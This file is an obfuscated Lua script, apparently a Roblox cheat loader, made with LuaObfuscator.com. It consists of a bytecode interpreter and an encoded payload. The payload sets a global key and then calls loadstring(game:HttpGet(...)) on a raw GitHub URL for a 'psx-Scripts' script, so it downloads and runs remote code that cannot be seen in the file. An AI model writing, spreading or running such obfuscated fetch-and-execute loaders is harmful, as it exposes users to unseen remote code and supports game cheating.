--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==3) then v10=setmetatable;v11=pcall;v12=select;v0=4;end if (v0==2) then v7=table.concat;v8=table.insert;v9=getfenv or function()return _ENV;end;v0=3;end if (4==v0) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v0=5;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==5) then function v15(v16,v17)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v39=0 + 0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==(0 -0)) then v40=1922 -(1236 + 686);v41=nil;v39=1;end if (v39~=1) then else v42=nil;v43=nil;v39=2;end if (v39~=3) then else v46=nil;while true do if (v40==(1303 -(407 + 896))) then local v76=0 -0;while true do if (0==v76) then v41={};v42={};v76=1;end if (v76==(4 -2)) then v40=1 -0;break;end if (v76==1) then v43={};v44={v41,v42,nil,v43};v76=4 -2;end end end if (v40~=(3 -1)) then else local v77=0;while true do if (v77==(0 + 0)) then for v81=1,v24() do local v82=0;local v83;local v84;local v85;while true do if (1==v82) then v85=nil;while true do if (v83==(0 + 0)) then local v110=0 -0;while true do if (v110~=(226 -(100 + 125))) then else v83=1;break;end if (v110==(0 + 0)) then local v115=0;while true do if (v115==1) then v110=1892 -(1799 + 92);break;end if (v115~=0) then else v84=0;v85=nil;v115=2 -1;end end end end end if (v83==1) then while true do if (v84==0) then v85=v22();if (v21(v85,611 -(535 + 75),1)~=(771 -(672 + 99))) then else local v119=0 + 0;local v120;local v121;local v122;local v123;local v124;local v125;while true do if (v119~=2) then else v124=nil;v125=nil;v119=3;end if (v119~=(1534 -(155 + 1379))) then else v120=0;v121=nil;v119=3 -2;end if (v119~=1) then else v122=nil;v123=nil;v119=5 -3;end if (3==v119) then while true do if (v120==1) then local v144=0;while true do if (v144==(0 + 0)) then v123=nil;v124=nil;v144=1;end if (v144==1) then v120=2;break;end end end if ((0 + 0)==v120) then local v145=1247 -(119 + 1128);while true do if ((57 -(14 + 42))==v145) then v120=1 + 0;break;end if (v145==(585 -(470 + 115))) then v121=0;v122=nil;v145=1;end end end if (v120~=2) then else v125=nil;while true do if ((606 -(577 + 28))==v121) then local v154=325 -(237 + 88);local v155;while true do if (0==v154) then v155=0;while true do if (v155~=1) then else v121=2;break;end if (v155~=(816 -(479 + 337))) then else v124=nil;v125=nil;v155=1;end end break;end end end if (v121==(1559 -(620 + 939))) then local v156=0;while true do if (v156~=0) then else v122=0;v123=nil;v156=2 -1;end if (v156~=(2 -1)) then else v121=1;break;end end end if (v121==2) then while true do if (v122~=0) then else local v163=0;local v164;local v165;while true do if (v163~=0) then else v164=0 + 0;v165=nil;v163=1;end if (1==v163) then while true do if (v164==(0 + 0)) then v165=0;while true do if (v165==(2 -1)) then v122=1;break;end if (v165==(0 -0)) then local v176=0;local v177;while true do if (v176==0) then v177=0 + 0;while true do if (v177~=(0 -0)) then else local v184=0 + 0;while true do if (v184~=(0 -0)) then else v123=v21(v85,1 + 1,48 -(39 + 6));v124=v21(v85,4,6);v184=1;end if (v184==1) then v177=510 -(331 + 178);break;end end end if (v177==(2 -1)) then v165=1145 -(209 + 935);break;end end break;end end end end break;end end break;end end end if (v122==2) then local v166=0 -0;local v167;while true do if (v166~=(1769 -(1749 + 20))) then else v167=0 + 0;while true do if (v167~=0) then else local v173=0 -0;while true do if (v173~=(1 + 0)) then else v167=1180 -(896 + 283);break;end if (v173==(0 -0)) then if (v21(v124,1,1 -0)==(2 -1)) then v125[2]=v46[v125[1 + 1]];end if (v21(v124,2,4 -2)==(2 -1)) then v125[1889 -(574 + 1312)]=v46[v125[322 -(66 + 253)]];end v173=1 -0;end end end if (v167==(1 + 0)) then v122=2 + 1;break;end end break;end end end if ((1 + 0)~=v122) then else local v168=0;local v169;while true do if (v168==(0 -0)) then v169=0;while true do if (v169==(0 + 0)) then local v174=0;while true do if (v174==(532 -(142 + 389))) then v169=260 -(216 + 43);break;end if (v174~=(0 + 0)) then else v125={v23(),v23(),nil,nil};if (v123==0) then local v180=0 + 0;local v181;local v182;while true do if (v180==1) then while true do if (v181==0) then v182=0 + 0;while true do if (v182==(865 -(297 + 568))) then v125[3]=v23();v125[4]=v23();break;end end break;end end break;end if (v180==(0 -0)) then v181=0;v182=nil;v180=1;end end elseif (v123==1) then v125[3]=v24();elseif (v123==2) then v125[276 -(48 + 225)]=v24() -((1231 -(291 + 938))^(16 + 0));elseif (v123==3) then local v186=0 + 0;local v187;local v188;while true do if (v186==(0 -0)) then v187=0;v188=nil;v186=1 + 0;end if (v186==1) then while true do if (v187==0) then v188=0;while true do if (v188~=(0 + 0)) then else v125[3]=v24() -(2^(749 -(356 + 377)));v125[4]=v23();break;end end break;end end break;end end end v174=3 -2;end end end if (1~=v169) then else v122=2;break;end end break;end end end if (v122==(1252 -(1014 + 235))) then if (v21(v124,3,3)~=1) then else v125[4 + 0]=v46[v125[4]];end v41[v81]=v125;break;end end break;end end break;end end break;end end end break;end end break;end end break;end if (v82==(121 -(8 + 113))) then v83=0 + 0;v84=nil;v82=1 -0;end end end for v86=1,v24() do v42[v86-(1 + 0)]=v29();end v77=346 -(131 + 214);end if (v77~=1) then else for v88=1 + 0,v24() do v43[v88]=v24();end return v44;end end end if (v40==1) then local v78=0;local v79;while true do if (v78==0) then v79=0;while true do if (v79==0) then v45=v24();v46={};v79=1;end if (v79~=2) then else v40=4 -2;break;end if (v79~=(2 -1)) then else local v106=0;while true do if (v106~=0) then else for v111=1663 -(155 + 1507),v45 do local v112=1407 -(485 + 922);local v113;local v114;while true do if (1==v112) then if (v113==(59 -(37 + 21))) then v114=v22()~=(0 + 0);elseif (v113==2) then v114=v25();elseif (v113==3) then v114=v26();end v46[v111]=v114;break;end if (v112~=(0 -0)) then else local v117=318 -(181 + 137);local v118;while true do if (v117==0) then v118=0 -0;while true do if ((0 -0)~=v118) then else local v138=0 -0;while true do if (v138~=(1 + 0)) then else v118=1 + 0;break;end if (v138~=(0 -0)) then else v113=v22();v114=nil;v138=1;end end end if (v118==1) then v112=1 + 0;break;end end break;end end end end end v44[484 -(396 + 85)]=v22();v106=2 -1;end if (v106==(1 -0)) then v79=1333 -(1203 + 128);break;end end end end break;end end end end break;end if (v39==2) then v44=nil;v45=nil;v39=1089 -(816 + 270);end end end v18=5;end if (v18==2) then function v23()local v47,v48=v2(v16,v19,v19 + (877 -(732 + 143)));v19=v19 + 2 + 0;return (v48 * (479 -223)) + v47;end v24=nil;function v24()local v49,v50,v51,v52=v2(v16,v19,v19 + (11 -8));v19=v19 + (14 -10);return (v52 * (36049224 -19272008)) + (v51 * 65536) + (v50 * (328 -72)) + v49;end v25=nil;v18=3;end if (v18==1) then function v21(v31,v32,v33)if v33 then local v64=(v31/((2 + 0)^(v32-(1 + 0))))%((1482 -(733 + 747))^(((v33-(1 -0)) -(v32-((510 -(38 + 469)) -2))) + ((3 -2) -(0 + 0))));return v64-(v64%(485 -(350 + (208 -(4 + 70)))));else local v65=0 + 0;local v66;while true do if (v65==(0 + (339 -(191 + 148)))) then v66=(3 -1)^(v32-1);return (((v31%(v66 + v66))>=v66) and (1816 -(868 + 947))) or ((1411 -(1405 + 6)) -0);end end end end v22=nil;function v22()local v53=v2(v16,v19,v19);v19=v19 + 1;return v53;end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v34,v35,v36)local v54=0;local v55;local v56;local v57;while true do if (v54==0) then v55=v34[1];v56=v34[2];v54=1;end if (v54==1) then v57=v34[3];return function(...)local v70=0;local v71;local v72;local v73;local v74;local v75;while true do if (2==v70) then v75=nil;function v75()local v90=v55;local v91=Const;local v92=v56;local v93=v57;local v94=v28;local v95={};local v96={};local v97={};for v103=564 -(170 + 381 + 13),v74 do if (((481 + 2297)>2738) and (v103>=v93)) then v95[v103-v93]=v73[v103 + 1];else v97[v103]=v73[v103 + 1 + 0];end end local v98=(v74-v93) + (2 -(1 + 0));local v99;local v100;while true do local v104=0 + 0;local v105;while true do if (((5747 -(845 + 439))>=(3586 -1864)) and ((0 -0)==v104)) then v105=0 + (0 -0);while true do if (((9496 -(3030 + 4320))<=((18626 -(866 + 657)) -(9489 + 3923))) and (v105==(1 -0))) then if ((v100<=(4 + 0)) or ((13884 -8936)<(1867 -1404))) then if ((v100<=(2 -(1 -0))) or ((2524 + 581)==(1405 -(572 + 390)))) then if ((v100==(730 -(410 + 320))) or ((4881 -(30 + 880))<(2544 + 177))) then do return;end else local v126=1462 -(11 + 1451);local v127;local v128;local v129;while true do if (((1155 -(18 + 237 + 495))<=(3589 -(356 + 24))) and (v126==(1 + 0))) then v129=nil;while true do if ((v127==(0 + 0)) or ((3716 -2704)>=(4821 -(419 + 1454)))) then local v147=0;local v148;while true do if ((v147==(0 -(0 + 0))) or ((1733 + 980)<=(6377 -3770))) then v148=1545 -(1043 + 502);while true do if ((v148==(1763 -(1648 + 114))) or ((2355 + 818)<=(1046 + 771))) then v127=(1749 -(310 + 1438)) + 0;break;end if (((54 + 240)<(2814 -1278)) and (v148==((1187 + 660) -((1270 -722) + 1299)))) then v128=v99[1824 -(926 + 896)];v129=v97[v99[1780 -((5532 -4376) + 621)]];v148=1802 -(786 + 1015);end end break;end end end if (((2278 + 165)>(3778 -2628)) and (v127==(1 + 0))) then v97[v128 + (1943 -(422 + 1520))]=v129;v97[v128]=v129[v99[4]];break;end end break;end if (((5745 -2537)>(8572 -5924)) and (v126==(0 + 0))) then v127=(0 -0) + (0 -0);v128=nil;v126=(1106 + 456) -(1351 + (403 -193));end end end elseif (((1451 + 338)==(2554 -765)) and (v100<=(1499 -(471 + 1026)))) then local v130=(447 -217) -(213 + 17);local v131;local v132;local v133;local v134;local v135;while true do if (((1697 -(1476 + 95))<=(1411 -456)) and ((0 + 0)==v130)) then local v143=0 + 0;while true do if ((v143==(0 + 0)) or ((8892 -6046)>=(654 + (6775 -4317)))) then v131=0 + 0;v132=nil;v143=4 -(2 + 1);end if ((v143==(1 + 0)) or ((5336 -(327 + 809))==((2173 + 8801) -6371))) then v130=(33 + 170) -((1892 -(1559 + 238)) + 107);break;end end end if ((v130==(4 -2)) or ((2137 + 320)<(445 + 1949))) then v135=nil;while true do if (((2562 -(43 + 554))<(2970 -((2387 -(425 + 1524)) + 89))) and (v131==(1887 -(1094 + 793)))) then local v151=0 + 0 + 0;local v152;while true do if ((v151==(0 + 0)) or (((4908 + 5537) -6298)>(10028 -5380))) then v152=0 -0;while true do if (((0 + (0 -0))==v152) or ((4361 -(94 + 344))==((6779 -(25 + 986)) -(352 + 570)))) then local v172=0 + 0 + 0;while true do if (((11443 -8246)<(5418 -(867 + 651))) and (v172==1)) then v152=1 + 0;break;end if ((v172==((1207 -(960 + 247)) -0)) or ((68 + 2404)<=(496 + 779))) then v132=v99[1 + 0 + (1804 -(1621 + 182))];v133,v134=v94(v97[v132](v13(v97,v132 + 1,v99[2 + 1 + (189 -(9 + 180))])));v172=(1378 -(1238 + 139)) + 0;end end end if ((v152==1) or ((1029 + 259 + 1091)==(1321 -(249 + 338)))) then v131=2 -1;break;end end break;end end end if ((v131==((1 + 0) -0)) or ((303 + 912 + 44)>=(3906 + 705))) then local v153=(0 + 0) -(0 + 0);while true do if (((76 + 1459)<=((2086 + 1493) -(8 + 98))) and (v153==(1 + (1412 -(347 + 1065))))) then v131=1559 -(501 + 1056);break;end if (((178 + 2155)==(4252 -(1200 + 719))) and (v153==(0 + 0 + 0))) then local v162=790 -(780 + 10);while true do if (((2461 -1828)==(1952 -(814 + 505))) and ((1 + 0)==v162)) then v153=1 -(0 -0);break;end if ((((74 + 129) -(95 + 108))==v162) or (((3327 + 12840) -12026)==(5327 -(909 + 134)))) then v72=(v134 + v132) -((2281 -(81 + 281)) -(1512 + 406));v135=806 -(287 + 519);v162=1 + 0;end end end end end if ((((3661 + 1274) -((1154 -(19 + 1065)) + 171))>(990 + 3437)) and (v131==(1263 -((279 -125) + 573 + 534)))) then for v157=v132,v72 do local v158=0 + 0;local v159;local v160;while true do if ((v158==(1 -0)) or ((5808 -3645)<(494 + 1072 + 52 + 289))) then while true do if (((6398 -3130)==(12023 -8755)) and (v159==((32 + 98) -(28 + (233 -131))))) then v160=687 -(339 + 348);while true do if (((2959 -2001)>=(1777 -1375)) and (((0 + 0) -0)==v160)) then v135=v135 + 1 + 0;v97[v157]=v133[v135];break;end end break;end end break;end if (((915 -(268 + 647))==v158) or ((15181 -10817)<=(1115 + 948))) then v159=0 + 0;v160=nil;v158=(1848 -(4 + 7)) -(341 + 1495);end end end break;end end break;end if (((5305 -(1252 + 396))<=(5603 -(306 + 913))) and (v130==(1 -0))) then v133=nil;v134=nil;v130=1126 -(1098 + 26);end end elseif ((((5561 -(277 + 596)) -(147 + (913 -159)))==(622 + 3165)) and (v100==(1 + 2))) then v71=v99[(2283 -(1152 + 537)) -(450 + 141)];else v97[v99[(3 -2) + 1]]=v99[5 -(2 + 0)];end elseif ((v100<=(270 -(239 + 25))) or ((2028 -(18 + 1796))>=(4591 -(84 + 33)))) then if (((5685 -(302 + 1361))>(2069 -(63 + 182))) and (v100==(12 -7))) then v97[v99[1 + 1]]=v36[v99[1 + 2]];else v97[v99[5 -3]][v99[1 + 2]]=v99[(3308 -2039) -(776 + 489)];end elseif ((((2100 -(878 + 700)) + (2944 -2003))<=(5264 -(578 + 348))) and (v100<=(1 + 6))) then v97[v99[(2509 -1526) -(639 + 342)]]();elseif (((7666 -3304)<(5673 -((2331 -(1076 + 661)) + 107))) and (v100==(1 + 7 + 0))) then if ((v97[v99[2 + 0 + 0]]==v99[14 -10]) or (((9006 -4388) -(3122 -(961 + 494)))<((9208 -4932) -(683 + 1154)))) then v71=v71 + 1 + 0;else v71=v99[1649 -(50 + 646 + 950)];end else local v140=1644 -(39 + 1605);local v141;local v142;while true do if (((5007 -(804 + 443))==((5362 -1373) -(84 + 20 + 125))) and (v140==(215 -(149 + (1724 -(445 + 1214)))))) then while true do if ((((199 -79) + 154 + 189)==(1268 -805)) and (v141==(0 -0))) then v142=v99[4 -(1737 -(1315 + 420))];v97[v142]=v97[v142](v13(v97,v142 + (1907 -(1519 + 387)),v72));break;end end break;end if (((1986 -(991 + 736))<(590 + 113)) and (v140==(0 + 0))) then local v146=(336 -(18 + 318)) + 0;while true do if (((3392 -1097)>(1717 + 173)) and (v146==(1373 -(543 + 829)))) then v140=1207 -(1128 + 78);break;end if (((5891 -(509 + 993))>=(708 + 741)) and ((92 -(80 + 12))==v146)) then v141=0 + 0;v142=nil;v146=412 -(187 + 224);end end end end end v71=v71 + 1 + 0;break;end if (((7068 -4987)<=4087) and ((13 -(6 + (57 -(28 + 22))))==v105)) then v99=v90[v71];v100=v99[2 -1];v105=2 -1;end end break;end end end end v70=3;end if (v70==0) then v71=1;v72= -1;v70=1;end if (v70==1) then v73={...};v74=v12("#",...) -1;v70=2;end if (v70==3) then A,B=v28(v11(v75));if  not A[1] then local v101=0;local v102;while true do if (v101==0) then v102=v34[4][v71] or "?";error("Script error at ["   .. v102   .. "]:"   .. A[2]);break;end end else return v13(A,2,B);end break;end end end;end end end return v30(v29(),{},v17)();end if (v18==0) then v19=1;v20=nil;v16=v5(v4(v16,5),"..",function(v37)if (v2(v37,2)==79) then v20=v1(v4(v37,1,1));return "";else local v67=0;local v68;while true do if (v67==0) then v68=v3(v1(v37,16));if v20 then local v80=v6(v68,v20);v20=nil;return v80;else return v68;end break;end end end end);v21=nil;v18=1;end if (v18==3) then function v25()local v58=v24();local v59=v24();return (( -(4 -2) * v21(v59,95 -63)) + (1323 -((1399 -740) + 663))) * ((1915 -(966 + (1879 -932)))^(v21(v59,7 + (1924 -(1610 + 300)),5 + 26) -(427 + 596))) * ((((v21(v59,1,59 -39) * (((4939 -3195) -(989 + (2532 -(1161 + 618))))^(14 + 18))) + v58)/((1 + 0 + 1)^(236 -184))) + (1 -0));end v26=nil;function v26(v38)local v60;if  not v38 then local v69=0;while true do if (v69==(0 + 0)) then v38=v24();if (v38==(0 + 0)) then return "";end break;end end end v60=v4(v16,v19,(v19 + v38) -(1 + 0));v19=v19 + v38;local v61={};for v62=1205 -(697 + 507), #v60 do v61[v62]=v3(v2(v4(v60,v62,v62)));end return v7(v61);end v27=v24;v18=4;end end end v15("LOL!083O00028O0003023O005F472O033O004B657903053O007270675F6F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403483O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7073782D536372697074732F70737873632F6D61696E2F7363726970742D76342D312E6C7561000F3O0012043O00013O0026083O0001000100010004033O00010001001205000100023O003006000100030004001205000100053O001205000200063O002001000200020007001204000400084O0002000200044O000900013O00022O00070001000100010004033O000E00010004033O000100016O00017O000F3O00023O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v9());break;end end end
